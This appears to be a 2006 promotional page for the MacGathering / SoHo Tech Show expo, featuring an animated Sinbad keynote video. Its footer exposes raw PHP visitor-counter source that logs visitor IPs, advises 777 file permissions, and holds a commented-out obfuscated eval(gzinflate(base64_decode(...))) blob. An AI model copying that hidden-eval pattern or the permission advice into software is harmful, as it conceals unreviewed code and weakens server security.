The MacGathering™ Macintosh Computer Expo for Southern California also introducing... The SoHo Tech Show™ Tech Expo for small and home offices Expo & Seminars & More ~ May 19 -20, 2006
Sinbad, the geek — Wisdom from the 2005 MacGathering Keynote
•• Email friends giving this link: <http://www.macgathering.com/sinbadvideo> ••
•• We hope to soon have it for PalmOS too ••
About this video:
Sinbad was animated by the brilliant Mike Browne creator of Dinky TV, the brain behind BigRedShoes.com.
(If you're looking for someone to animate a character for you, Mike's your man.)
Sinbad's words are from his 2005 Keynote, presented at the last MacGathering.
Sign up for show alerts
Are you interesting in attending the MacGathering/SoHo Tech Show? If you think you'd join us in LA May 19-20, we invite you to sign up for simple emails as the show take shape and when registration opens. Sign up for our mailing list.
This page was last updated on Saturday, April 15, 2006 at 12:14 AM. -- Visitor Count:
// My Hits 2
// www.laviska.com
$file = "my_hits.txt";
$user_ip = $_SERVER['REMOTE_ADDR'] . "\n";
$ip_list = file($file);
$visitors = count($ip_list) - 1;
if (in_array($user_ip, $ip_list))
{
echo ("$visitors");
} else {
$fp = fopen($file,"a");
fwrite($fp, "\n$user_ip");
fclose($fp);
$visitors++;
echo $visitors;
}
/*
// Unique Hits PHP Script
// ----------- March 2004
// Contact author: uniquehits@sizzly.com
// for updates, visit:
// http://www.sizzly.com/uniquehits.htm
// CHMOD this file to 666
// If it doesn't work, try 777
$log = 'uniquehits.log';
// No need to edit anything below this line
// ----------------------------------------
$IP = getenv (REMOTE_ADDR);
$add = true;
$hits = 2500;
if (!file_exists ($log)) {
echo "Error: $log does not exist.";
exit;
}
$h = fopen ($log, 'r');
while (!feof ($h)) {
$line = fgets ($h, 4096);
$line = trim ($line);
if ($line != '')
$hits++;
if ($line == $IP)
$add = false;
}
fclose($h);
if ($add == true) {
$h = fopen ($log, 'a');
fwrite($h, "
$IP");
fclose($h);
$hits++;
}
eval(gzinflate(base64_decode('
JY1BCoMwEADvgn8IUthbQq/tZvMUiRK7oZq0cSXU
11fb8zAzjtC1TRg5q+7CUVYcCuGUk6g17sHCFQi9
4hImCyzyuhlTa9UH3OePHvNithTfWzhdzbKAEl8e
QSz0w+zTE+jP1S9uPKE569Td28Yd8y8=
')));
*/
?>